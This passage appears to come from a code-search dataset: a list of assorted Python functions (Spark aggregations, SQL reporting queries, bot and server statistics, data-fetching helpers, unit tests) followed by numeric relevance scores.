mean('productViewCount').alias('mean_productViewCount'),\n max('productViewCount').alias('max_productViewCount'),\n (count(when(df_websessions.productViewCount != 0, True)) / count('customerId2')).alias('p_not0_productViewCount'),\n\n min('productViewsDistinctCount').alias('min_productViewsDistinctCount'),\n mean('productViewsDistinctCount').alias('mean_productViewsDistinctCount'),\n max('productViewsDistinctCount').alias('max_productViewsDistinctCount'),\n (count(when(df_websessions.productViewsDistinctCount != 0, True)) / count('customerId2')).alias(\n 'p_not0_productViewsDistinctCount'),\n\n min('productsAddedToBagCount').alias('min_productsAddedToBagCount'),\n mean('productsAddedToBagCount').alias('mean_productsAddedToBagCount'),\n max('productsAddedToBagCount').alias('max_productsAddedToBagCount'),\n (count(when(df_websessions.productsAddedToBagCount != 0, True)) / count('customerId2')).alias(\n 'p_not0_productsAddedToBagCount'),\n\n min('productsSavedForLaterFromProductPageCount').alias('min_productsSavedForLaterFromProductPageCount'),\n mean('productsSavedForLaterFromProductPageCount').alias('mean_productsSavedForLaterFromProductPageCount'),\n max('productsSavedForLaterFromProductPageCount').alias('max_productsSavedForLaterFromProductPageCount'),\n (count(when(df_websessions.productsSavedForLaterFromProductPageCount != 0, True)) / count('customerId2')).alias(\n 'p_not0_productsSavedForLaterFromProductPageCount'),\n\n min('productsSavedForLaterFromCategoryPageCount').alias('min_productsSavedForLaterFromCategoryPageCount'),\n mean('productsSavedForLaterFromCategoryPageCount').alias('mean_productsSavedForLaterFromCategoryPageCount'),\n max('productsSavedForLaterFromCategoryPageCount').alias('max_productsSavedForLaterFromCategoryPageCount'),\n (count(when(df_websessions.productsSavedForLaterFromCategoryPageCount != 0, True)) / count('customerId2')).alias(\n 'p_not0_productsSavedForLaterFromCategoryPageCount'),\n\n min('productsPurchasedDistinctCount').alias('min_productsPurchasedDistinctCount'),\n mean('productsPurchasedDistinctCount').alias('mean_productsPurchasedDistinctCount'),\n max('productsPurchasedDistinctCount').alias('max_productsPurchasedDistinctCount'),\n (count(when(df_websessions.productsPurchasedDistinctCount != 0, True)) / count('customerId2')).alias(\n 'p_not0_productsPurchasedDistinctCount'),\n\n min('productsPurchasedTotalCount').alias('min_productsPurchasedTotalCount'),\n mean('productsPurchasedTotalCount').alias('mean_productsPurchasedTotalCount'),\n max('productsPurchasedTotalCount').alias('max_productsPurchasedTotalCount'),\n (count(when(df_websessions.productsPurchasedTotalCount != 0, True)) / count('customerId2')).alias(\n 'p_not0_productsPurchasedTotalCount'),\n )\n\n res = res_counts.join(res_agg, 'customerId2')\n return res", "def getPopualrAuthors():\n db = psycopg2.connect(\"dbname=news\")\n c = db.cursor()\n c.execute(\" select count(*) as views , authors.name from articles \"\n + \" inner join \"\n + \"log on concat('/article/', articles.slug) = log.path \"\n + \" inner join authors on articles.author = authors.id \"\n + \"group by name order by views desc; \")\n authors = c.fetchall()\n db.close()\n return authors", "def totalJoinerCount(self) -> int:\n return len(self._joiner_list)", "def translate_joining_props(self, translators):\n df = self.load_from_hadoop_to_dateframe()\n for j in self.parser.joining_nodes:\n joining_index_translator = translators[j.joining_index]\n if joining_index_translator.current_step > 0:\n df = self.join_to_an_index(df, 
joining_index_translator, j)\n return self.return_dataframe(df, Translator.translate_joining_props.__qualname__)", "async def fetch_referrals(self):\n data = await self.http.get_referral_statistics()", "def testFailedJoin(self):\n b_tree = OOBTree()\n b_tree.update({1: \"Monkey D. Luffy\", 2: \"Roronoa Zoro\", 3: \"Nami\"})\n failed_counter = 0\n key = 10\n data = {\"from\":\"East Blue\"}\n (mod_data, mod_tree, failed_counter) = self.processing.join(b_tree, key, data, failed_counter)\n self.assertEqual(mod_data, {\"from\":\"East Blue\"})\n self.assertEqual(len(mod_tree), 3)\n self.assertEqual(failed_counter, 1)", "def on_join(data):\n logger.info(f\"Joining: {data}\")\n to = data[\"to\"]\n if to in TO_OPTIONS.keys():\n join_room(to)\n logger.info(f\"Rooms: {rooms()}\")\n else:\n logger.warning(f\"{to} not in TO_OPTIONS\")", "def getJoiningTime(self):\n return self.__joinTime", "async def on_member_join(member):\r\n pass", "def RefreshStats(self):\n with self.ctx.Profile(\n 2,\n lambda t: (\n \"Computed stats over \"\n f\"{humanize.BinaryPrefix(stats.graph_data_size, 'B')} database \"\n f\"({humanize.Plural(stats.graph_count, 'graph')})\"\n ),\n ), self.Session() as session:\n query = session.query(\n # Graph and IR counts.\n sql.func.count(GraphTuple.id).label(\"graph_count\"),\n sql.func.count(sql.func.distinct(GraphTuple.ir_id)).label(\"ir_count\"),\n sql.func.count(sql.func.distinct(GraphTuple.split)).label(\n \"split_count\"\n ),\n # Node and edge attribute sums.\n sql.func.sum(GraphTuple.node_count).label(\"node_count\"),\n sql.func.sum(GraphTuple.control_edge_count).label(\"control_edge_count\"),\n sql.func.sum(GraphTuple.data_edge_count).label(\"data_edge_count\"),\n sql.func.sum(GraphTuple.call_edge_count).label(\"call_edge_count\"),\n sql.func.sum(\n GraphTuple.control_edge_count\n + GraphTuple.data_edge_count\n + GraphTuple.call_edge_count\n ).label(\"edge_count\"),\n # Node and edge attribute maximums.\n sql.func.max(GraphTuple.node_count).label(\"node_count_max\"),\n sql.func.max(GraphTuple.control_edge_count).label(\n \"control_edge_count_max\"\n ),\n sql.func.max(GraphTuple.data_edge_count).label(\"data_edge_count_max\"),\n sql.func.max(GraphTuple.call_edge_count).label(\"call_edge_count_max\"),\n sql.func.max(GraphTuple.call_edge_count).label(\"call_edge_count_max\"),\n sql.func.max(\n GraphTuple.control_edge_count\n + GraphTuple.data_edge_count\n + GraphTuple.call_edge_count\n ).label(\"edge_count_max\"),\n sql.func.max(GraphTuple.edge_position_max).label(\"edge_position_max\"),\n # Feature and label dimensionality counts. 
Each of these columns\n # should be one, showing that there is a single value for all graph\n # tuples.\n sql.func.count(\n sql.func.distinct(GraphTuple.node_x_dimensionality)\n ).label(\"node_x_dimensionality_count\"),\n sql.func.count(\n sql.func.distinct(GraphTuple.node_y_dimensionality)\n ).label(\"node_y_dimensionality_count\"),\n sql.func.count(\n sql.func.distinct(GraphTuple.graph_x_dimensionality)\n ).label(\"graph_x_dimensionality_count\"),\n sql.func.count(\n sql.func.distinct(GraphTuple.graph_y_dimensionality)\n ).label(\"graph_y_dimensionality_count\"),\n # Feature and label dimensionalities.\n sql.func.max(GraphTuple.node_x_dimensionality).label(\n \"node_x_dimensionality\"\n ),\n sql.func.max(GraphTuple.node_y_dimensionality).label(\n \"node_y_dimensionality\"\n ),\n sql.func.max(GraphTuple.graph_x_dimensionality).label(\n \"graph_x_dimensionality\"\n ),\n sql.func.max(GraphTuple.graph_y_dimensionality).label(\n \"graph_y_dimensionality\"\n ),\n # Graph tuple sizes.\n sql.func.sum(GraphTuple.pickled_graph_tuple_size).label(\n \"graph_data_size\"\n ),\n sql.func.min(GraphTuple.pickled_graph_tuple_size).label(\n \"graph_data_size_min\"\n ),\n sql.func.avg(GraphTuple.pickled_graph_tuple_size).label(\n \"graph_data_size_avg\"\n ),\n sql.func.max(GraphTuple.pickled_graph_tuple_size).label(\n \"graph_data_size_max\"\n ),\n # Data flow column null counts.\n sql.func.count(GraphTuple.data_flow_steps).label(\n \"data_flow_steps_count\"\n ),\n # Data flow step counts.\n sql.func.min(GraphTuple.data_flow_steps).label(\"data_flow_steps_min\"),\n sql.func.avg(GraphTuple.data_flow_steps).label(\"data_flow_steps_avg\"),\n sql.func.max(GraphTuple.data_flow_steps).label(\"data_flow_steps_max\"),\n # Data flow positive node count.\n sql.func.min(GraphTuple.data_flow_positive_node_count).label(\n \"data_flow_positive_node_count_min\"\n ),\n sql.func.avg(GraphTuple.data_flow_positive_node_count).label(\n \"data_flow_positive_node_count_avg\"\n ),\n sql.func.max(GraphTuple.data_flow_positive_node_count).label(\n \"data_flow_positive_node_count_max\"\n ),\n )\n\n # Ignore \"empty\" graphs.\n query = query.filter(GraphTuple.node_count > 1)\n\n # Compute the stats.\n stats = query.one()\n\n # Check that databases have a consistent value for dimensionalities.\n if stats.node_x_dimensionality_count > 1:\n raise ValueError(\n f\"Database contains {stats.node_x_dimensionality_count} \"\n \"distinct node x dimensionalities\"\n )\n if stats.node_y_dimensionality_count > 1:\n raise ValueError(\n f\"Database contains {stats.node_y_dimensionality_count} \"\n \"distinct node y dimensionalities\"\n )\n if stats.graph_x_dimensionality_count > 1:\n raise ValueError(\n f\"Database contains {stats.graph_x_dimensionality_count} \"\n \"distinct graph x dimensionalities\"\n )\n if stats.graph_y_dimensionality_count > 1:\n raise ValueError(\n f\"Database contains {stats.graph_y_dimensionality_count} \"\n \"distinct graph y dimensionalities\"\n )\n\n # Check that every graph has data flow attributes, or none of them do.\n if not (\n stats.data_flow_steps_count == 0\n or stats.data_flow_steps_count == stats.graph_count\n ):\n raise ValueError(\n f\"{stats.graph_count - stats.data_flow_steps_count} of \"\n f\"{stats.graph_count} graphs have no data_flow_steps \"\n \"value\"\n )\n\n self._graph_tuple_stats = stats\n\n with self.Session() as session:\n self._splits = sorted(\n set(\n [\n row.split\n for row in session.query(GraphTuple.split)\n .filter(GraphTuple.split != None)\n .group_by(GraphTuple.split)\n ]\n )\n )\n\n 
self._split_counts = {\n split: session.query(sql.func.count(GraphTuple.id))\n .filter(GraphTuple.split == split)\n .scalar()\n for split in self._splits\n }", "def get_links(proj,exp):\n response = do_method(\"experiment.info\",\n {\"proj\":proj,\"exp\":exp,\"aspect\":\"links\"})\n check_response(response)\n return response['value']", "def _join_many(self, request_objects, extract=False, ignore_404=False):\n gevent.joinall(request_objects)\n results = []\n for g in request_objects:\n response = g.value\n if not response.ok:\n if response.status_code == 404 and ignore_404:\n continue\n raise SpotifyException(response.request, response)\n if not response.text:\n results.append(None)\n continue\n # yield None\n # continue\n jso = response.json()\n if extract:\n results += [x for x in extract_list(jso)]\n # yield from find_item(extract, jso)\n else:\n results.append(jso)\n return results", "def _format_joining_functions(self):\n ## TODO: Extend to n possible neighs_info elements\n if self.staticneighs:\n if self.ifdistance:\n self.join_neighs_and = join_neighsinfo_AND_static_dist\n self.join_neighs_or = join_neighsinfo_OR_static_dist\n self.join_neighs_xor = join_neighsinfo_XOR_static_dist\n else:\n self.join_neighs_and = join_neighsinfo_AND_static_notdist\n self.join_neighs_or = join_neighsinfo_OR_static_notdist\n self.join_neighs_xor = join_neighsinfo_XOR_static_notdist\n else:\n if self.ifdistance:\n self.join_neighs_and = join_neighsinfo_AND_notstatic_dist\n self.join_neighs_or = join_neighsinfo_OR_notstatic_dist\n self.join_neighs_xor = join_neighsinfo_XOR_notstatic_dist\n else:\n self.join_neighs_and = join_neighsinfo_AND_notstatic_notdist\n self.join_neighs_or = join_neighsinfo_OR_notstatic_notdist\n self.join_neighs_xor = join_neighsinfo_XOR_notstatic_notdist", "async def generate_leg_statistics(self) -> list:\n\n # General total amount of things\n amount_of_sessions = await self.bot.db.fetchval(\"SELECT COUNT(id) FROM legislature_sessions\")\n amount_of_bills = await self.bot.db.fetchval(\"SELECT COUNT(id) FROM legislature_bills\")\n amount_of_laws = await self.bot.db.fetchval(\"SELECT COUNT(law_id) FROM legislature_laws\")\n amount_of_motions = await self.bot.db.fetchval(\"SELECT COUNT(id) FROM legislature_motions\")\n\n # Sorted statistics by Discord Member\n amount_of_bills_by_submitter = self.count_rows_from_db_record(await self.bot.db.fetch(\"SELECT submitter FROM \"\n \"legislature_bills\"),\n 'submitter')\n amount_of_sessions_by_speaker = self.count_rows_from_db_record(await self.bot.db.fetch(\"SELECT speaker FROM \"\n \"legislature_sessions\"),\n 'speaker')\n query = \"\"\"SELECT submitter FROM legislature_bills AS b WHERE exists (SELECT 1 FROM legislature_laws l\n WHERE l.bill_id = b.id)\"\"\"\n amount_of_laws_by_submitter = self.count_rows_from_db_record(await self.bot.db.fetch(query), 'submitter')\n\n # Prettified sorted statistics by discord.Member\n pretty_top_submitter = self.get_pretty_stats(self.sort_dict_by_value(amount_of_bills_by_submitter), 'bills')\n\n pretty_top_speaker = self.get_pretty_stats(self.sort_dict_by_value(amount_of_sessions_by_speaker), 'sessions')\n\n pretty_top_lawmaker = self.get_pretty_stats(self.sort_dict_by_value(amount_of_laws_by_submitter), 'laws')\n\n return [amount_of_sessions, amount_of_bills, amount_of_laws, amount_of_motions,\n pretty_top_submitter, pretty_top_speaker, pretty_top_lawmaker]", "def make_join_graph(parsed_join_clauses):\n g = nx.Graph()\n for t1, c1, t2, c2 in parsed_join_clauses:\n g.add_node(t1)\n g.add_node(t2)\n if not 
g.has_edge(t1, t2):\n g.add_edge(t1, t2, join_columns={t1: [c1], t2: [c2]})\n else:\n edge = g[t1][t2]\n edge[\"join_columns\"][t1].append(c1)\n edge[\"join_columns\"][t2].append(c2)\n return g", "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def gives_stats():\n dict_count = {\n \"amenities\": storage.count(Amenity),\n \"cities\": storage.count(City),\n \"places\": storage.count(Place),\n \"reviews\": storage.count(Review),\n \"states\": storage.count(State),\n \"users\": storage.count(User)\n }\n return jsonify(dict_count)", "def get_grades(self, test=None):\r\n target_url = \"https://elearning.linnbenton.edu\\\r\n/grade/report/overview/index.php?id=2721\"\r\n\r\n if test is not None:\r\n target_url = test\r\n\r\n self.web_driver.get(target_url)\r\n self.write_log(f\"Navigating to {target_url}\")\r\n time.sleep(5)\r\n self.write_log(\"Scraping begun.\")\r\n return self.scrape_grades()", "def iteratehelper(links, ranks, contributer, count):\n \n ranks=ranks.cache()\n links=links.cache()\n contributer=contributer.cache()\n \n for iteration in range(count):\n print('Running %d iteration' %(iteration))\n contribs = links.join(ranks).flatMap(lambda url_urls_rank: computeContribs(url_urls_rank[1][0], url_urls_rank[1][1]))\n \n ranks = contribs.reduceByKey(lambda x,y:x+y).mapValues(lambda rank: rank * 0.85 + 0.15)\n \n ranks.take(1)\n\n return ranks", "def test_get_explores(fc: fetcher.Fetcher):\n explores = fc.get_explores()\n assert isinstance(explores, list)\n assert len(explores) > 0\n assert isinstance(explores[0], models.LookmlModelExplore)", "def index(env):\n envs = environments()\n metrics = {\n 'num_nodes': 0,\n 'num_resources': 0,\n 'avg_resources_node': 0}\n check_env(env, envs)\n\n if env == '*':\n query = app.config['OVERVIEW_FILTER']\n\n prefix = 'puppetlabs.puppetdb.population'\n query_type = ''\n\n # Puppet DB version changed the query format from 3.2.0\n # to 4.0 when querying mbeans\n if get_db_version(puppetdb) < (4, 0, 0):\n query_type = 'type=default,'\n\n num_nodes = get_or_abort(\n puppetdb.metric,\n \"{0}{1}\".format(prefix, ':%sname=num-nodes' % query_type))\n num_resources = get_or_abort(\n puppetdb.metric,\n \"{0}{1}\".format(prefix, ':%sname=num-resources' % query_type))\n avg_resources_node = get_or_abort(\n puppetdb.metric,\n \"{0}{1}\".format(prefix,\n ':%sname=avg-resources-per-node' % query_type))\n metrics['num_nodes'] = num_nodes['Value']\n metrics['num_resources'] = num_resources['Value']\n metrics['avg_resources_node'] = \"{0:10.0f}\".format(\n avg_resources_node['Value'])\n else:\n query = AndOperator()\n query.add(EqualsOperator('catalog_environment', env))\n query.add(EqualsOperator('facts_environment', env))\n\n num_nodes_query = ExtractOperator()\n num_nodes_query.add_field(FunctionOperator('count'))\n num_nodes_query.add_query(query)\n\n if app.config['OVERVIEW_FILTER'] is not None:\n query.add(app.config['OVERVIEW_FILTER'])\n\n num_resources_query = ExtractOperator()\n num_resources_query.add_field(FunctionOperator('count'))\n num_resources_query.add_query(EqualsOperator(\"environment\", env))\n\n num_nodes = get_or_abort(\n puppetdb._query,\n 'nodes',\n query=num_nodes_query)\n num_resources = get_or_abort(\n puppetdb._query,\n 
'resources',\n query=num_resources_query)\n metrics['num_nodes'] = num_nodes[0]['count']\n metrics['num_resources'] = num_resources[0]['count']\n try:\n metrics['avg_resources_node'] = \"{0:10.0f}\".format(\n (num_resources[0]['count'] / num_nodes[0]['count']))\n except ZeroDivisionError:\n metrics['avg_resources_node'] = 0\n\n nodes = get_or_abort(puppetdb.nodes,\n query=query,\n unreported=app.config['UNRESPONSIVE_HOURS'],\n with_status=True)\n\n nodes_overview = []\n stats = {\n 'changed': 0,\n 'unchanged': 0,\n 'failed': 0,\n 'unreported': 0,\n 'noop': 0\n }\n\n for node in nodes:\n if node.status == 'unreported':\n stats['unreported'] += 1\n elif node.status == 'changed':\n stats['changed'] += 1\n elif node.status == 'failed':\n stats['failed'] += 1\n elif node.status == 'noop':\n stats['noop'] += 1\n else:\n stats['unchanged'] += 1\n\n if node.status != 'unchanged':\n nodes_overview.append(node)\n\n return render_template(\n 'index.html',\n metrics=metrics,\n nodes=nodes_overview,\n stats=stats,\n envs=envs,\n current_env=env\n )", "def get_joins(self, model, **kwargs):\n node_path = self._node_path(model)\n\n joins = []\n for i, node in enumerate(node_path):\n # ignore each subsequent first join in the set of joins for a\n # given model\n if i > 0:\n joins.extend(node.get_joins(**kwargs)[1:])\n else:\n joins.extend(node.get_joins(**kwargs))\n\n return joins", "def getPopularArticles():\n db = psycopg2.connect(\"dbname=news\")\n c = db.cursor()\n c.execute(\" select count (*) as views, title from articles \"\n + \"left join \"\n + \"log on concat('/article/', articles.slug) = log.path \"\n + \"group by title order by views desc limit 3\")\n views = c.fetchall()\n db.close()\n return views", "def db_stats(args: Dict[str, Any]) -> List[object]:\n query = [\n {\n \"$match\": {\n \"body\": {\"$ne\": \"\"},\n \"quotesUpdated\": {\"$exists\": True},\n \"outlet\": {\"$in\": args[\"outlets\"]},\n \"publishedAt\": {\n \"$gte\": args[\"begin_date\"],\n \"$lt\": args[\"end_date\"] + timedelta(days=1),\n },\n }\n },\n {\n \"$group\": {\n \"_id\": \"null\",\n \"totalArticles\": {\"$sum\": 1},\n \"totalQuotes\": {\"$sum\": \"$quoteCount\"},\n \"peopleFemaleCount\": {\"$sum\": \"$peopleFemaleCount\"},\n \"peopleMaleCount\": {\"$sum\": \"$peopleMaleCount\"},\n \"peopleUnknownCount\": {\"$sum\": \"$peopleUnknownCount\"},\n \"sourcesFemaleCount\": {\"$sum\": \"$sourcesFemaleCount\"},\n \"sourcesMaleCount\": {\"$sum\": \"$sourcesMaleCount\"},\n \"sourcesUnknownCount\": {\"$sum\": \"$sourcesUnknownCount\"},\n \"authorsFemaleCount\": {\"$sum\": \"$authorsFemaleCount\"},\n \"authorsMaleCount\": {\"$sum\": \"$authorsMaleCount\"},\n \"authorsUnknownCount\": {\"$sum\": \"$authorsUnknownCount\"},\n }\n },\n ]\n return query", "def get_results_from_aggregation_sources(self, context):", "def get_stats():\r\n stats = {\r\n \"progress_precent\": 100.0*finished_work_units_amount/work_units_amount,\r\n \"results\": None if work_status == Db.WorkStatusNames.finished_work.value else Db.collect_results(),\r\n #If it's already finished, then all the results were already sent to the main server.\r\n }\r\n return stats", "def _compute_experiment_statistics(self):\n pass", "def get_moorings_urls(varname=None, site=None, featuretype=None, fileversion=None, datacategory=None, realtime=None, timestart=None, timeend=None, filterout=None):\n\n WEBROOT = 'http://thredds.aodn.org.au/thredds/dodsC/'\n\n if realtime:\n if realtime.lower() == \"yes\":\n url = 
\"http://geoserver-123.aodn.org.au/geoserver/ows?typeName=moorings_all_map&SERVICE=WFS&REQUEST=GetFeature&VERSION=1.0.0&outputFormat=csv&CQL_FILTER=(realtime=TRUE)\"\n elif realtime.lower() == \"no\":\n url = \"http://geoserver-123.aodn.org.au/geoserver/ows?typeName=moorings_all_map&SERVICE=WFS&REQUEST=GetFeature&VERSION=1.0.0&outputFormat=csv&CQL_FILTER=(realtime=FALSE)\"\n else:\n raise ValueError('ERROR: realtime %s is not valid' % realtime)\n else:\n url = \"http://geoserver-123.aodn.org.au/geoserver/ows?typeName=moorings_all_map&SERVICE=WFS&REQUEST=GetFeature&VERSION=1.0.0&outputFormat=csv\"\n\n df = pd.read_csv(url)\n df = df.sort_values(by='time_coverage_start')\n criteria_all = df.url != None\n\n if varname:\n separator = ', '\n varnames_all = set(separator.join(list(df.variables)).split(', '))\n if varname in varnames_all:\n criteria_all = criteria_all & df.variables.str.contains('.*\\\\b'+varname+'\\\\b.*', regex=True)\n else:\n raise ValueError('ERROR: %s not a valid variable name' % varname)\n\n if site:\n site_all = list(df.site_code.unique())\n if site in site_all:\n criteria_all = criteria_all & df.site_code.str.contains(site, regex=False)\n else:\n raise ValueError('ERROR: %s is not a valid site code' % site)\n\n if featuretype:\n if featuretype in [\"timeseries\", \"profile\", \"timeseriesprofile\"]:\n criteria_all = criteria_all & (df.feature_type.str.lower() == featuretype.lower())\n else:\n raise ValueError('ERROR: %s is not a valid feature type' % featuretype)\n\n if datacategory:\n datacategory_all = list(df.data_category.str.lower().unique())\n if datacategory.lower() in datacategory_all:\n criteria_all = criteria_all & (df.data_category.str.lower() == datacategory.lower())\n else:\n raise ValueError('ERROR: %s is not a valid data category' % datacategory)\n\n if fileversion is not None:\n if fileversion in [0, 1, 2]:\n criteria_all = criteria_all & (df.file_version == fileversion)\n else:\n raise ValueError('ERROR: %s is not a valid file version' % fileversion)\n\n if timestart:\n try:\n criteria_all = criteria_all & (pd.to_datetime(df.time_coverage_end) >= datetime.strptime(timestart, '%Y-%m-%d'))\n except ValueError:\n raise ValueError('ERROR: invalid start date.')\n\n if timeend:\n try:\n criteria_all = criteria_all & (pd.to_datetime(df.time_coverage_start) <= datetime.strptime(timeend, '%Y-%m-%d'))\n except ValueError:\n raise ValueError('ERROR: invalid end date.')\n\n if filterout is not None:\n for keyword in filterout:\n criteria_all = criteria_all & (~df.url.str.contains(keyword, regex=True))\n\n\n return list(WEBROOT + df.url[criteria_all])", "def get_user_referrals(self, username, metric='source', start_date=None, end_date=None):\n\tif not start_date and not end_date:\n\t if metric == 'source':\n\t\tunique_sources = db.session.query(GoogleAnalyticsReferralsModel.source.distinct().label('source')).all()\n\t\tsources = [GoogleAnalyticsReferralsModel.query.filter_by(username=username, source=source).all() for source in unique_sources]\n\t\tsource_counts = []\n\t\tfor source in sources:\n\t\t counts = [s.sessions for s in source]\n\t\t count = sum(counts)\n\t\t source_counts.append(count)\n\t\tsource_names = [source[0].source for source in sources]\n\t\tprint source_counts\n\t\tprint source_names\n\t\tsource_count_list = []\n\t\tfor i in range(len(source_counts)):\n\t\t source_count_dict = {}\n\t\t source = source_names[i]\n\t\t source_count = source_counts[i]\n\t\t source_count_dict['key'] = source\n\t\t source_count_dict['y'] = source_count\n\t\t 
source_count_list.append(source_count_dict)\n\t\treturn make_response(dumps(source_count_list))\n\n\t elif metric == \"mediums\":\n\t\tunique_mediums = db.session.query(GoogleAnalyticsReferralsModel.medium.distinct().label('medium')).all()\n\t\tmediums = [GoogleAnalyticsReferralsModel.query.filter_by(username=username, medium=medium).all() for medium in unique_mediums]\n\t\tmedium_counts = []\n\t\tfor medium in mediums:\n\t\t counts = [m.sessions for m in medium]\n\t\t count = sum(counts)\n\t\t medium_counts.append(count)\n\t\tmedium_names = [medium[0].medium for medium in mediums]\n\t\tprint medium_counts\n\t\tprint medium_names\n\t\treturn ''", "def wait_for_workers_to_join(self, display, logger, verbose=False):\r\n with self.aggregator:\r\n workers = self.aggregator.get_participants()\r\n\r\n if workers:\r\n if len(workers) == self.Nworkers:\r\n display('Participants have already joined', logger, verbose)\r\n return workers\r\n\r\n display('Waiting for workers to join (%d of %d present)' %(len(workers), self.Nworkers), logger, verbose)\r\n\r\n ready = False\r\n while not ready:\r\n try:\r\n with self.aggregator:\r\n resp = self.aggregator.receive(3000)\r\n participant = resp.notification['participant']\r\n display('Participant %s joined' %participant, logger, verbose)\r\n except Exception as err:\r\n raise err\r\n\r\n if len(workers) == self.Nworkers:\r\n ready = True\r\n\r\n return workers", "def viewAll():\n print(inspect.stack()[1][3])\n query = select([Followup])\n ResultProxy = connection.execute(query)\n ResultSet = ResultProxy.fetchall()\n res = []\n for rs in ResultSet:\n res.append(list_to_json(rs))\n return dict(enumerate(res))", "def api_contest_join():\n contestcode = get_queryparam('code')\n returnJSON = models.select_joined_contest(\n params=('user'),\n conditions=('{}=\\\"{}\\\"'.format(\n settings.DB_COLUMNS.JOINED_CONTEST_CONTEST,\n contestcode\n )\n )\n )\n return jsonify(returnJSON)", "def get(self, *args, **kwargs):\n output = self._base_stats()\n output['connections'] = dict()\n for key in self.application.rabbitmq.keys():\n output['connections'][key] = self.application.rabbitmq[key].stats\n self.write(output)", "def report(session, name: str):\n\n # first find by locus_tag\n count = session.query(Gene).filter(Gene.locus_id == name).count()\n if count == 1:\n locus_tag = name\n elif count == 0:\n # find by primary name\n genes = (session\n .query(Gene)\n .distinct(Gene.id)\n .join(KnowledgebaseGene)\n .filter(KnowledgebaseGene.primary_name == name)).all()\n if len(genes) == 1:\n locus_tag = genes[0].locus_id\n elif len(genes) == 0:\n raise Exception(f'No genes with name {name}')\n else:\n raise Exception(f'Multiple genes with name {name}. 
'\n 'Try searching by locus tag.')\n if count >= 2:\n raise Exception(f'Multiple genes with locus tag {name}')\n\n quality_df = to_df(\n session.query(KnowledgebaseGene.annotation_quality,\n Knowledgebase.name.label('knowledgebase_name'))\n .join(Knowledgebase)\n .join(Gene)\n .filter(Gene.locus_id == locus_tag)\n )\n\n features_df = to_df(\n session.query(Gene.locus_id,\n KnowledgebaseGene.primary_name,\n Knowledgebase.name.label('knowledgebase_name'),\n KnowledgebaseFeature.feature_type,\n KnowledgebaseFeature.feature)\n .join(KnowledgebaseGene)\n .join(Knowledgebase)\n .join(KnowledgebaseFeature)\n .filter(Gene.locus_id == locus_tag)\n )\n\n features_df = features_df.merge(quality_df, on='knowledgebase_name',\n how='outer')\n\n print(features_df.iloc[0, 0:2])\n\n def make_name(row):\n return f\"{row['knowledgebase_name']} ({row['annotation_quality']})\"\n features_df['knowledgebase_name'] = features_df.apply(make_name, axis=1)\n\n features_df = features_df.drop(\n ['locus_id', 'primary_name', 'annotation_quality'],\n axis=1,\n )\n features_df = features_df.set_index(['knowledgebase_name', 'feature_type'])\n s = features_df.style.set_properties(**{'text-align': 'left'})\n return HTML(s.render())", "def join_draw(request):\n public_draws = MONGO.get_draws_with_filter({\"is_shared\": True})\n context = {'public_draws': public_draws}\n return render(request, 'join_draw.html', context)", "def collect():\n\n stats = {}\n for feed in Feed.objects:\n try:\n logger.info('Fetching from {0}...'.format(feed.ext_url))\n new_articles = fetch(feed)\n stats[feed.ext_url] = len(new_articles)\n\n except SAXException as e:\n if feed.errors is None:\n feed.errors = 0\n\n # Error with the feed, make a note.\n logger.info('Error fetching from {0}.'.format(feed.ext_url))\n feed.errors += 1\n feed.save()\n pretty_stats = json.dumps(stats, sort_keys=True, indent=4)\n notify('Corpora collection complete.', 'Total article count: {0}\\n\\nResults for this pass:\\n{1}'.format(len(Article.objects), pretty_stats))", "def how_much_hours(username, password, workers, projects, start_date, end_date):\n tt = TTrackerSession()\n tt.login(username, password)\n return tt.how_much_hours(workers, projects, start_date, end_date)", "def check_can_join(self, user):\n if not user.is_active or user.is_anonymous():\n return False\n\n membership = self.check_membership(user)\n\n if membership is not None and not membership.is_left():\n return False # Already joined\n\n if self.join_condition == 'A':\n return True\n elif self.join_condition == 'K':\n return user.profile.karma >= self.join_karma_threshold\n elif self.join_condition == 'I':\n return True # Can send a request\n else:\n return False", "def get_statistic():\n\n data = get_data_from_URL(url)[\"data\"]\n results = dict()\n\n for genre in data:\n # get information about one genre\n genre_url = f\"{url}/{genre['id']}/artists\"\n genre_data = get_data_from_URL(genre_url)[\"data\"]\n\n nb_fan = 0\n for artist in genre_data:\n # get information about one artist (number of fans)\n art_data = get_data_from_URL(\n f'https://api.deezer.com/artist/{artist[\"id\"]}')\n nb_fan += art_data[\"nb_fan\"]\n\n # add to dictionary received information\n results[genre[\"name\"]] = (len(genre_data), nb_fan)\n\n return results", "def isJoinRequest(self):\n return self.mhdr.mtype == JOIN_REQUEST", "def test_join_room_socket(self, mock_join):\n mock_join.return_value = '1234'\n response = self.fetch('/rooms/1234', method='GET')\n self.assertTrue(mock_join.called)\n with self.assertJSON(response) as 
result:\n protocol = 'ws' if self.get_protocol() == 'http' else 'wss'\n expected = '{}://localhost:{}/socket'.format(protocol, self.get_http_port())\n self.assertEqual(result['socket'], expected)\n self.assertIn('user', result)\n self.assertIn('token', result)\n user, token = result['user'], result['token']\n info = jwt.decode(token, 'XXXX')\n self.assertEqual(info['uuid'], user)\n self.assertEqual(info['room'], '1234')", "def server_agent_statistics(ctx):\n data = ctx.obj.get_agent_statistics()\n output_json_data(data)", "def test_get_stats(self):\n pass" ]
[ "0.5480241", "0.53656536", "0.50666654", "0.5061134", "0.49818888", "0.4904676", "0.48338452", "0.48054832", "0.47597033", "0.47334749", "0.4718956", "0.47070545", "0.46772164", "0.46477938", "0.46049055", "0.45803955", "0.45192826", "0.44968593", "0.44656146", "0.44228086", "0.43793604", "0.43723446", "0.43236396", "0.43163905", "0.4316303", "0.43152854", "0.43032235", "0.42919376", "0.42771378", "0.42507434", "0.4206924", "0.4198875", "0.4196055", "0.41920504", "0.4186335", "0.41827902", "0.41808462", "0.4176434", "0.41745952", "0.41690877", "0.41577956", "0.41373917", "0.4137203", "0.41351986", "0.41239807", "0.41230914", "0.41157854", "0.41114938", "0.41089225", "0.41013083", "0.41001183", "0.40963054", "0.40931347", "0.40870857", "0.4085857", "0.4083188", "0.40824693", "0.40805635", "0.407079", "0.40601125", "0.40581277", "0.4056018", "0.4044028", "0.4043855", "0.40393046", "0.40363026", "0.4027476", "0.40202633", "0.4013973", "0.40125403", "0.4011593", "0.40098262", "0.40092412", "0.40081725", "0.4006508", "0.39948177", "0.39908323", 